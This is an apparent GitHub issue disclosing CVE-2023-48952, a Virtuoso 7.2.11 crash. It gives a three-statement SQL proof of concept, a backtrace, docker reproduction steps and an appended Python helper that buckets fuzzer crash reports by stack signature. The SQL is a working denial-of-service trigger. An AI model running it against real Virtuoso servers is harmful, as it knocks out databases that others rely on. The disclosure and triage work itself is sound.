CVE-2023-48952: Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing · Issue #1175 · openlink/virtuoso-opensource
An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
The PoC is generated by my DBMS fuzzer.
```sql
CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ;
INSERT INTO v0 VALUES ( 20 , -1 ) ;
SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + -1 * 40 ;
```
backtrace:

```
#0 0x876418 (box_deserialize_reusing+0x38)
#1 0x87917e (sslr_qst_get+0x46e)
#2 0x81f2f6 (select_node_input_vec+0x656)
#3 0x7ba667 (select_node_input+0xa7)
#4 0x7af05e (qn_input+0x3ce)
#5 0x7af78f (qn_ts_send_output+0x23f)
#6 0x7b509e (table_source_input+0x16ee)
#7 0x7af05e (qn_input+0x3ce)
#8 0x7af4c6 (qn_send_output+0x236)
#9 0x7af05e (qn_input+0x3ce)
#10 0x7af4c6 (qn_send_output+0x236)
#11 0x8214bd (set_ctr_vec_input+0x99d)
#12 0x7af05e (qn_input+0x3ce)
#13 0x7c084b (qr_exec+0x11db)
#14 0x7ce1d6 (sf_sql_execute+0x11a6)
#15 0x7cecde (sf_sql_execute_w+0x17e)
#16 0x7d799d (sf_sql_execute_wrapper+0x3d)
#17 0xe214bc (future_wrapper+0x3fc)
#18 0xe28dbe (_thread_boot+0x11e)
#19 0x7fca3837c609 (start_thread+0xd9)
#20 0x7fca3814c133 (clone+0x43)
```
Ways to reproduce (write the PoC to the file /tmp/test.sql first):

```sh
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait for the server to start
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba
```
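A crash-triage helper, added here as an example (it is not part of the issue or of Virtuoso): it parses the backtrace posted above into frames and derives an address-independent signature, so a maintainer can group the many reports a DBMS fuzzer produces into distinct bugs. The `NOISE` set of thread-startup frames to ignore is an assumption chosen for this trace.

```python
import hashlib
import re
from typing import List, Tuple

# One symbolised frame, e.g. "#0 0x876418 (box_deserialize_reusing+0x38)".
FRAME_RE = re.compile(r"#(\d+)\s+0x[0-9a-fA-F]+\s+\((\w+)\+0x([0-9a-fA-F]+)\)")

# Assumption: thread-startup frames present in every Virtuoso worker crash;
# they say nothing about the bug, so they are excluded from the signature.
NOISE = {"future_wrapper", "_thread_boot", "start_thread", "clone"}

# Sample input: the backtrace from the issue above, on one line as reported.
ISSUE_BACKTRACE = (
    "#0 0x876418 (box_deserialize_reusing+0x38) #1 0x87917e (sslr_qst_get+0x46e) "
    "#2 0x81f2f6 (select_node_input_vec+0x656) #3 0x7ba667 (select_node_input+0xa7) "
    "#4 0x7af05e (qn_input+0x3ce) #5 0x7af78f (qn_ts_send_output+0x23f) "
    "#6 0x7b509e (table_source_input+0x16ee) #7 0x7af05e (qn_input+0x3ce) "
    "#8 0x7af4c6 (qn_send_output+0x236) #9 0x7af05e (qn_input+0x3ce) "
    "#10 0x7af4c6 (qn_send_output+0x236) #11 0x8214bd (set_ctr_vec_input+0x99d) "
    "#12 0x7af05e (qn_input+0x3ce) #13 0x7c084b (qr_exec+0x11db) "
    "#14 0x7ce1d6 (sf_sql_execute+0x11a6) #15 0x7cecde (sf_sql_execute_w+0x17e) "
    "#16 0x7d799d (sf_sql_execute_wrapper+0x3d) #17 0xe214bc (future_wrapper+0x3fc) "
    "#18 0xe28dbe (_thread_boot+0x11e) #19 0x7fca3837c609 (start_thread+0xd9) "
    "#20 0x7fca3814c133 (clone+0x43)"
)


def parse_backtrace(text: str) -> List[Tuple[int, str, int]]:
    """Return (frame number, symbol, offset) for each frame, innermost first."""
    frames = [(int(n), sym, int(off, 16)) for n, sym, off in FRAME_RE.findall(text)]
    return sorted(frames)


def crash_signature(text: str, depth: int = 3) -> str:
    """Symbols of the top `depth` non-noise frames, joined with '|'.

    Absolute addresses are left out on purpose: they shift between builds and
    with ASLR, while the symbol sequence identifies the crashing code path.
    """
    syms = [sym for _, sym, _ in parse_backtrace(text) if sym not in NOISE]
    return "|".join(syms[:depth])


def crash_bucket(text: str, depth: int = 3) -> str:
    """Short stable id for grouping duplicate crash reports from a fuzzer."""
    digest = hashlib.sha256(crash_signature(text, depth).encode()).hexdigest()
    return digest[:12]
```

Two reports land in the same bucket when their top frames agree, even if the binary was rebased; raising `depth` separates crashes that share only the innermost frame.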